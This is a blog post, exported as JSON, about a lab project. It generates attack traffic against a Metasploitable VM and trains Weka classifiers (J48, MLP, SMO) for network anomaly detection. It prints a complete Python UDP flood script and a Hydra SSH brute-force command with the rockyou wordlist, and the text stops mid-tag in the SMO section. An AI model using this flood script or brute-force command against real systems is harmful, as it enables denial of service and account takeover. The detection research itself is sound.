{"id":4392,"date":"2021-10-13T11:02:50","date_gmt":"2021-10-13T03:02:50","guid":{"rendered":"http:\/\/mayanknauni.com\/?p=4392"},"modified":"2022-12-12T13:19:19","modified_gmt":"2022-12-12T05:19:19","slug":"basic-machine-learning-network-anomaly-detection","status":"publish","type":"post","link":"https:\/\/mayanknauni.com\/?p=4392","title":{"rendered":"Basic Machine Learning : Network Anomaly Detection"},"content":{"rendered":"<p><strong><em>Disclaimer:-<\/em><\/strong><em> This note was written by me (Mayank Nauni)\u00a0in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.<\/em><\/p>\n<p>Special thanks to <a href=\"https:\/\/www.linkedin.com\/in\/kennyongjh\">Kenny Ong<\/a>, my friend &amp; course-mate at Singapore University of Technology and Design, for collaborating with me on this mini-project, and to <a href=\"https:\/\/www.linkedin.com\/in\/tao-liu-2b050423\/\">Tao Liu<\/a> for his excellent blog on the same subject: <a href=\"https:\/\/www.linkedin.com\/pulse\/build-machine-learning-model-network-flow-tao-liu\/\">https:\/\/www.linkedin.com\/pulse\/build-machine-learning-model-network-flow-tao-liu\/<\/a><\/p>\n<h1><a id=\"post-4392-_Toc80553219\"><\/a>Introduction<\/h1>\n<p>The number of network attacks has risen steadily as advances in Internet technologies continue to improve our lives, and in recent years network intrusion detection has become a significant research topic in the industry.<\/p>\n<p>The term <em>network anomaly detection<\/em> refers to the identification of rare and unexpected bursts of activity within a computer network.
A network anomaly is a deliberate intrusion attempt aimed at (i) accessing information, (ii) manipulating information, or (iii) rendering a computer system or network unreliable or unusable.<\/p>\n<p>In this project, a proper setup for anomaly detection requires grasping the concept of normality: which captured traffic counts as normal and which as anomalous needs to be defined. Tools that help create such datasets can yield more findings in the area of network intrusion detection methods and systems (NIDS).<\/p>\n<h2><a id=\"post-4392-_Toc80553220\"><\/a>Lab Setup and Topology<\/h2>\n<p>The network topology is set up in the GNS3 emulator to simulate the network anomaly detection system. The devices and virtual machines (VMs) are as follows:<\/p>\n<ul>\n<li>Switch (Gateway) based on a Cisco IOS image (12.4) \u2013 10.0.2.1<\/li>\n<li>Kali attacker VM \u2013 2021.2 release \u2013 10.0.2.15<\/li>\n<li>Metasploitable-2 VM \u2013 10.0.2.2<\/li>\n<li>SIEM VM \u2013 10.0.2.30<\/li>\n<\/ul>\n<p>GitHub Repo: <a href=\"https:\/\/github.com\/mayanknauni\/ML_Cybersecurity\">https:\/\/github.com\/mayanknauni\/ML_Cybersecurity<\/a><\/p>\n<h3><a id=\"post-4392-_Toc80553221\"><\/a>Topology Brief:<\/h3>\n<p>The topology has been created on the GNS3 network emulator using a real IOS image for the Cisco switch (version 12.4); the Kali VM (2021.2 release) and the Metasploitable VM are created in VirtualBox, which is integrated with GNS3, and the VMs are connected to the switch using a generic driver (UDP tunnel).<\/p>\n<p>On the switch, we created a SPAN session that mirrors all traffic on the port connected to the Metasploitable VM to the SIEM VM. We use \u201ctshark\u201d on the SIEM VM to convert the captured \u201c.pcap\u201d files to \u201c.csv\u201d files.<\/p>\n<p>Below is the GNS3 topology we created and used for this project; the SIEM was an additional VM used to sniff the data during the attacks and see how a SIEM product perceives them.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"827\" height=\"687\" class=\"wp-image-4394 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.png?resize=827%2C687&#038;ssl=1\" alt=\"Diagram Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.png?w=827&amp;ssl=1 827w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.png?resize=300%2C249&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.png?resize=768%2C638&amp;ssl=1 768w\" sizes=\"auto, (max-width: 827px) 100vw, 827px\" \/><\/p>\n<h2><a id=\"post-4392-_Toc80553222\"><\/a>Strategy<\/h2>\n<p>We will try to build a machine learning model for Wireshark packet-flow classification, following the process below:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-4412 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/ML.jpg?resize=810%2C579&#038;ssl=1\" alt=\"\" width=\"810\" height=\"579\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/ML.jpg?w=810&amp;ssl=1 810w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/ML.jpg?resize=300%2C214&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/ML.jpg?resize=768%2C549&amp;ssl=1 768w\" sizes=\"auto, 
(max-width: 810px) 100vw, 810px\" \/><\/p>\n<p>Our strategy is to execute four attacks, elaborated in the Methods section, and manually capture packets for each of them at the Metasploitable server end. Each capture is labelled accordingly, and all four captures are later aggregated with the benign network capture to form a dataset.<\/p>\n<p>The dataset is then sanitized using a Python script that vets the dataset for NaN values and replaces the empty cells with 0.<\/p>\n<p>We also replaced the IP address and TCP flags values with integers so that our algorithms run properly.<\/p>\n<h1><a id=\"post-4392-_Toc80553223\"><\/a>Methods<\/h1>\n<p>Creating the datasets involves capturing the normal, benign communication between the clients and servers through Python scripts, with all traffic collected via Wireshark as the packet capture tool.<\/p>\n<p>The four kinds of attacks implemented and run from the malicious clients are as follows:<\/p>\n<ul>\n<li>DDoS<\/li>\n<li>Brute force<\/li>\n<li>Probe<\/li>\n<li>SQL<\/li>\n<\/ul>\n<p>The traffic from these attacks is merged with the benign traffic and labelled for classification and further analysis in Weka.<\/p>\n<h2><a id=\"post-4392-_Toc80553224\"><\/a>Attack Details<\/h2>\n<p>The attacks were carried out at the timestamps below:<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Start Time<\/strong><\/td>\n<td><strong>End Time<\/strong><\/td>\n<td><strong>Exploit<\/strong><\/td>\n<td><strong>Remark<\/strong><\/td>\n<\/tr>\n<tr>\n<td>8:05 pm<\/td>\n<td>8:15 pm<\/td>\n<td>Benign<\/td>\n<td>Simulating usual web access with watch at a 5-second interval<br \/>\nwatch -n 5 &#8220;curl http:\/\/10.0.2.2&#8221;<\/td>\n<\/tr>\n<tr>\n<td>8:16 pm<\/td>\n<td>8:20 pm<\/td>\n<td>DDoS<\/td>\n<td>ddos.py<\/td>\n<\/tr>\n<tr>\n<td>9:00 pm<\/td>\n<td>9:06 pm<\/td>\n<td>Probe<\/td>\n<td>nmap<\/td>\n<\/tr>\n<tr>\n<td>9:15 pm<\/td>\n<td>9:20 
pm<\/td>\n<td>Bruteforce<\/td>\n<td>Hydra<\/td>\n<\/tr>\n<tr>\n<td>9:30 pm<\/td>\n<td>9:37 pm<\/td>\n<td>SQL<\/td>\n<td>Metasploitable<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3><a id=\"post-4392-_Toc80553225\"><\/a>Benign Flow Capture<\/h3>\n<p>We simulated usual Web Access by using the watch at the 5-second interval and captured the packets:<\/p>\n<p>Command: watch -n 5 &#8220;curl http:\/\/10.0.2.2&#8221;<\/p>\n<h3><a id=\"post-4392-_Toc80553226\"><\/a>DDoS Attack and packet capture<\/h3>\n<p>We used the below-mentioned python code to simulate DDoS attack on Metasploitable2<\/p>\n<p>import sys<br \/>\nimport os<br \/>\nimport time<br \/>\nimport socket<br \/>\nimport random<br \/>\n#Code Time<br \/>\nfrom DateTime import datetime<br \/>\nnow = datetime.now()<br \/>\nhour = now.hour<br \/>\nminute = now.minute<br \/>\nday = now.day<br \/>\nmonth = now.month<br \/>\nyear = now.year<\/p>\n<p>##############<br \/>\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)<br \/>\nbytes = random._urandom(1490)<br \/>\n#############<\/p>\n<p>os.system(&#8220;clear&#8221;)<br \/>\nos.system(&#8220;figlet DDos Attack&#8221;)<br \/>\nprint<br \/>\nprint<br \/>\nip = raw_input(&#8220;IP Target : &#8220;)<br \/>\nport = input(&#8220;Port : &#8220;)<\/p>\n<p>os.system(&#8220;clear&#8221;)<br \/>\nos.system(&#8220;figlet Attack Starting&#8221;)<br \/>\ntime.sleep(3)<br \/>\nsent = 0<br \/>\nwhile True:<br \/>\nsock.sendto(bytes, (ip,port))<br \/>\nsent = sent + 1<br \/>\nport = port + 1<br \/>\nprint &#8220;Sent %s packet to %s throught port:%s&#8221;%(sent,ip,port)<br \/>\nif port == 65534:<br \/>\nport = 1<\/p>\n<p>Command: python2 ddos.py<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"526\" height=\"232\" class=\"wp-image-4395 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated.png?resize=526%2C232&#038;ssl=1\" alt=\"Text Description automatically generated\" 
srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated.png?w=526&amp;ssl=1 526w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated.png?resize=300%2C132&amp;ssl=1 300w\" sizes=\"auto, (max-width: 526px) 100vw, 526px\" \/><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"636\" height=\"667\" class=\"wp-image-4396 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-1.png?resize=636%2C667&#038;ssl=1\" alt=\"Text Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-1.png?w=636&amp;ssl=1 636w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-1.png?resize=286%2C300&amp;ssl=1 286w\" sizes=\"auto, (max-width: 636px) 100vw, 636px\" \/><\/p>\n<p>The attack ran endlessly until we broke out of the loop.<\/p>\n<h3><a id=\"post-4392-_Toc80553227\"><\/a>Nmap Probe and Packet Capture<\/h3>\n<p>We used the nmap command below to initiate a probe on Metasploitable2.<\/p>\n<p>Command: <em>nmap -sC -sV -oA project 10.0.2.2<\/em><\/p>\n<p>The packets were captured from the time the scan started until it completed successfully.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1817\" height=\"902\" class=\"wp-image-4397\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?resize=1817%2C902&#038;ssl=1\" alt=\"Graphical user interface, application Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?w=1817&amp;ssl=1 1817w, 
https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?resize=300%2C149&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?resize=1024%2C508&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?resize=768%2C381&amp;ssl=1 768w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?resize=1536%2C763&amp;ssl=1 1536w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<h3><a id=\"post-4392-_Toc80553228\"><\/a>Bruteforce and Packet Capture<\/h3>\n<p>We used Hydra to launch a brute-force attack on port 22 by SSH login attempts<\/p>\n<p>Command: <em>sudo hydra -V -f -t 4 -l msfadmin -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/10.0.2.2<\/em><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1892\" height=\"585\" class=\"wp-image-4398\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?resize=1892%2C585&#038;ssl=1\" alt=\"Graphical user interface Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?w=1892&amp;ssl=1 1892w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?resize=300%2C93&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?resize=1024%2C317&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?resize=768%2C237&amp;ssl=1 768w, 
https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?resize=1536%2C475&amp;ssl=1 1536w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<h2><a id=\"post-4392-_Toc80553229\"><\/a>Feature Extraction (using T-Shark)<\/h2>\n<p>Command:<\/p>\n<table>\n<tbody>\n<tr>\n<td>tshark -r http.pcap -T fields -E header=y -E separator=, -E quote=d -E occurrence=f -e ip.src -e ip.dst -e ip.len -e ip.flags.df -e ip.flags.mf \\-e ip.fragment -e ip.fragment.count -e ip.fragments -e ip.ttl -e ip.proto -e tcp.window_size -e tcp.ack -e tcp.seq -e tcp.len -e tcp.stream -e tcp.urgent_pointer \\-e tcp.flags -e tcp.analysis.ack_rtt -e tcp.segments -e tcp.reassembled.length -e http.request -e udp.port -e frame.time_relative -e frame.time_delta -e tcp.time_relative -e tcp.time_delta &gt; benign.csv<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>We are selecting below 26 features from the Wireshark capture: &#8211;<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Features<\/strong><\/td>\n<td><strong>Description<\/strong><\/td>\n<td><strong>Type<\/strong><\/td>\n<\/tr>\n<tr>\n<td>ip.src<\/td>\n<td>Source Address<\/td>\n<td>IPv4 address<\/td>\n<\/tr>\n<tr>\n<td>ip.dst<\/td>\n<td>Destination Address<\/td>\n<td>IPv4 address<\/td>\n<\/tr>\n<tr>\n<td>ip.len<\/td>\n<td>Total Length<\/td>\n<td>Unsigned integer, 2 bytes<\/td>\n<\/tr>\n<tr>\n<td>ip.flags.df<\/td>\n<td>Don\u2019t fragment<\/td>\n<td>Boolean<\/td>\n<\/tr>\n<tr>\n<td>ip.flags.mf<\/td>\n<td>More fragments<\/td>\n<td>Boolean<\/td>\n<\/tr>\n<tr>\n<td>ip.fragment<\/td>\n<td>IPv4 Fragment<\/td>\n<td>Frame number<\/td>\n<\/tr>\n<tr>\n<td>ip.fragment.count<\/td>\n<td>Fragment count<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>ip.fragments<\/td>\n<td>IPv4 Fragments<\/td>\n<td>Sequence of bytes<\/td>\n<\/tr>\n<tr>\n<td>ip.ttl<\/td>\n<td>Time to Live<\/td>\n<td>Unsigned integer, 1 byte<\/td>\n<\/tr>\n<tr>\n<td>ip.proto<\/td>\n<td>Protocol<\/td>\n<td>Unsigned 
integer, 1 byte<\/td>\n<\/tr>\n<tr>\n<td>tcp.window_size<\/td>\n<td>Calculated window size<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.ack<\/td>\n<td>Acknowledgment Number<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.seq<\/td>\n<td>Sequence Number<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.len<\/td>\n<td>TCP Segment Len<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.stream<\/td>\n<td>Stream index<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.urgent_pointer<\/td>\n<td>Urgent Pointer<\/td>\n<td>Unsigned integer, 2 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.flags<\/td>\n<td>Flags<\/td>\n<td>Unsigned integer, 2 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.analysis.ack_rtt<\/td>\n<td>The RTT to ACK the segment was<\/td>\n<td>Time offset<\/td>\n<\/tr>\n<tr>\n<td>tcp.segments<\/td>\n<td>Reassembled TCP Segments<\/td>\n<td>Label<\/td>\n<\/tr>\n<tr>\n<td>tcp.reassembled.length<\/td>\n<td>Reassembled TCP length<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>http.request<\/td>\n<td>Request<\/td>\n<td>Boolean<\/td>\n<\/tr>\n<tr>\n<td>udp.port<\/td>\n<td>Source or Destination Port<\/td>\n<td>Unsigned integer, 2 bytes<\/td>\n<\/tr>\n<tr>\n<td>frame.time_relative<\/td>\n<td>Time since reference or first frame<\/td>\n<td>Time offset<\/td>\n<\/tr>\n<tr>\n<td>frame.time_delta<\/td>\n<td>Time delta from previous captured frame<\/td>\n<td>Time offset<\/td>\n<\/tr>\n<tr>\n<td>tcp.time_relative<\/td>\n<td>Time since first frame in this TCP stream<\/td>\n<td>Time offset<\/td>\n<\/tr>\n<tr>\n<td>tcp.time_delta<\/td>\n<td>Time since previous frame in this TCP stream<\/td>\n<td>Time offset<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><a id=\"post-4392-_Toc80553230\"><\/a>Data Clean-up<\/h2>\n<p>Command: python3 step1_cleanup.py <em>benign.csv<\/em><\/p>\n<p>The script below cleans the supplied csv file (benign.csv in this case): all null values are filled in with 0, and non-integer fields such as tcp.flags, ip.dst and ip.src are converted into integers.<\/p>\n<p>#!\/usr\/bin\/env python3<br \/>\nimport sys<br \/>\nimport ipaddress<br \/>\nimport pandas as pd<\/p>\n<p># usage: python3 step1_cleanup.py benign.csv  (writes updated_benign.csv)<br \/>\nfilename = sys.argv[1]<br \/>\nfile1 = pd.read_csv(filename)<\/p>\n<p># step-1: tshark leaves a field empty when that protocol layer is absent from the frame<br \/>\n# (e.g. udp.port on a TCP packet); pandas reads those cells as NaN, so fill them with 0<br \/>\nupdate_file = file1.fillna(0)<\/p>\n<p># step-2: convert the non-numeric fields to integers so the classifiers can consume them<br \/>\n# tcp.flags is exported as a hex string such as 0x00000018; cells filled with 0 above parse to 0<br \/>\nupdate_file['tcp.flags'] = update_file['tcp.flags'].apply(lambda x: int(str(x), 16))<br \/>\n# dotted-quad addresses become their 32-bit integer value (0.0.0.0, i.e. 0, for the filled cells)<br \/>\nupdate_file['ip.dst'] = update_file['ip.dst'].apply(lambda x: int(ipaddress.IPv4Address(x)))<br \/>\nupdate_file['ip.src'] = update_file['ip.src'].apply(lambda x: int(ipaddress.IPv4Address(x)))<\/p>\n<p>update_file.to_csv('updated_' + filename, index=False)<\/p>\n<p>The command above generates a new file with the cleaned-up data as \u201cupdated_benign.csv\u201d.<\/p>\n<h2><a id=\"post-4392-_Toc80553231\"><\/a>Data Labelling<\/h2>\n<p>We use another Python script to add a column named \u201clabel\u201d to the file \u201cupdated_benign.csv\u201d and set its value with the command below: &#8211;<\/p>\n<p>Command: python2 step2_labelling.py benign <em>updated_benign.csv<\/em><\/p>\n<p>import sys<br \/>\nimport csv<\/p>\n<p># usage: python2 step2_labelling.py benign updated_benign.csv  (writes benign_updated_benign.csv)<br \/>\nlabel = sys.argv[1]<br \/>\nfile_name = sys.argv[2]<\/p>\n<p>rows = []<br \/>\nwith open(file_name) as infile:<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;content = csv.reader(infile)<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;header = next(content)  # first row holds the tshark field names<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;header.append('label')<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;rows.append(header)<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;for item in content:<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;item.append(label)  # every data row gets the label given on the command line<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;rows.append(item)<\/p>\n<p>with open(label + '_' + file_name, 'w') as new_file:<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;writer = csv.writer(new_file, lineterminator='\\n')<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;writer.writerows(rows)<\/p>\n<p>This creates a new file named benign_updated_benign.csv, where the benign prefix is the label we passed to the Python script.<\/p>\n<p>This step is repeated for all four attacks, so together with the benign file five labelled csv files are obtained: &#8211;<\/p>\n<ul>\n<li>benign_updated_benign.csv<\/li>\n<li>bruteforce_updated_bruteforce.csv<\/li>\n<li>ddos_updated_ddos.csv<\/li>\n<li>probe_updated_nmap.csv<\/li>\n<li>sqlattack_updated_sqlattack.csv<\/li>\n<\/ul>\n<p>We aggregate the above five files into our common dataset called \u201cmaster_dataset.csv\u201d, which we analyze further in Weka.<\/p>\n<h2><a id=\"post-4392-_Toc80553232\"><\/a>Analysis on Weka<\/h2>\n<p>We opened \u201cmaster_dataset.csv\u201d in the Weka software; a glimpse of the label attribute is below: &#8211;<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1010\" height=\"765\" class=\"wp-image-4399 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-1.png?resize=1010%2C765&#038;ssl=1\" alt=\"Graphical user interface, application Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-1.png?w=1010&amp;ssl=1 1010w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-1.png?resize=300%2C227&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-1.png?resize=768%2C582&amp;ssl=1 768w\" sizes=\"auto, 
(max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<h3><a id=\"post-4392-_Toc80553233\"><\/a>Feature Evaluation<\/h3>\n<p>We ran ReliefFAttributeEval, which yielded the results below:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1247\" height=\"813\" class=\"wp-image-4400 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-window-des.png?resize=1247%2C813&#038;ssl=1\" alt=\"A picture containing text, screenshot, window Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-window-des.png?w=1247&amp;ssl=1 1247w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-window-des.png?resize=300%2C196&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-window-des.png?resize=1024%2C668&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-window-des.png?resize=768%2C501&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<p>The top 15 attributes out of 26 are ranked 
below:<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Rank<\/strong><\/td>\n<td><strong>Attributes<\/strong><\/td>\n<\/tr>\n<tr>\n<td>1<\/td>\n<td>tcp.stream<\/td>\n<\/tr>\n<tr>\n<td>2<\/td>\n<td>ip.flags.df<\/td>\n<\/tr>\n<tr>\n<td>3<\/td>\n<td>tcp.flags<\/td>\n<\/tr>\n<tr>\n<td>4<\/td>\n<td>ip.proto<\/td>\n<\/tr>\n<tr>\n<td>5<\/td>\n<td>tcp.window_size<\/td>\n<\/tr>\n<tr>\n<td>6<\/td>\n<td>frame.time_relative<\/td>\n<\/tr>\n<tr>\n<td>7<\/td>\n<td>ip.len<\/td>\n<\/tr>\n<tr>\n<td>8<\/td>\n<td>ip.flags.mf<\/td>\n<\/tr>\n<tr>\n<td>9<\/td>\n<td>udp.port<\/td>\n<\/tr>\n<tr>\n<td>10<\/td>\n<td>ip.fragment.count<\/td>\n<\/tr>\n<tr>\n<td>11<\/td>\n<td>tcp.len<\/td>\n<\/tr>\n<tr>\n<td>12<\/td>\n<td>tcp.analysis.ack_rtt<\/td>\n<\/tr>\n<tr>\n<td>13<\/td>\n<td>ip.dst<\/td>\n<\/tr>\n<tr>\n<td>14<\/td>\n<td>ip.fragment<\/td>\n<\/tr>\n<tr>\n<td>15<\/td>\n<td>tcp.ack<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3><a id=\"post-4392-_Toc80553234\"><\/a>Running Different ML Models<\/h3>\n<h4><a id=\"post-4392-_Toc80553235\"><\/a>J48<\/h4>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1242\" height=\"810\" class=\"wp-image-4401 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-indoor-des.png?resize=1242%2C810&#038;ssl=1\" alt=\"A picture containing text, screenshot, indoor Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-indoor-des.png?w=1242&amp;ssl=1 1242w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-indoor-des.png?resize=300%2C196&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-indoor-des.png?resize=1024%2C668&amp;ssl=1 1024w, 
https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-indoor-des.png?resize=768%2C501&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<p><em>Correctly Classified Instances 16204 98.4088 %<\/em><\/p>\n<p><em>Incorrectly Classified Instances 262 1.5912 %<\/em><\/p>\n<h5><a id=\"post-4392-_Toc80553236\"><\/a>J48 Decision Tree View<\/h5>\n<p><em><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1908\" height=\"957\" class=\"wp-image-4402\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?resize=1908%2C957&#038;ssl=1\" alt=\"Text Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?w=1908&amp;ssl=1 1908w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?resize=300%2C150&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?resize=1024%2C514&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?resize=768%2C385&amp;ssl=1 768w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?resize=1536%2C770&amp;ssl=1 1536w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/em><\/p>\n<h4><a id=\"post-4392-_Toc80553237\"><\/a>MLP<\/h4>\n<p><strong><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1241\" height=\"806\" class=\"wp-image-4403 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-calendar-description-automat.png?resize=1241%2C806&#038;ssl=1\" alt=\"A picture containing calendar Description automatically generated\" 
srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-calendar-description-automat.png?w=1241&amp;ssl=1 1241w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-calendar-description-automat.png?resize=300%2C195&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-calendar-description-automat.png?resize=1024%2C665&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-calendar-description-automat.png?resize=768%2C499&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/strong><\/p>\n<p>Correctly Classified Instances 16148 98.0687 %<\/p>\n<p>Incorrectly Classified Instances 318 1.9313 %<\/p>\n<h4><a id=\"post-4392-_Toc80553238\"><\/a>SMO<\/h4>\n<p><strong><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1243\" height=\"812\" class=\"wp-image-4404 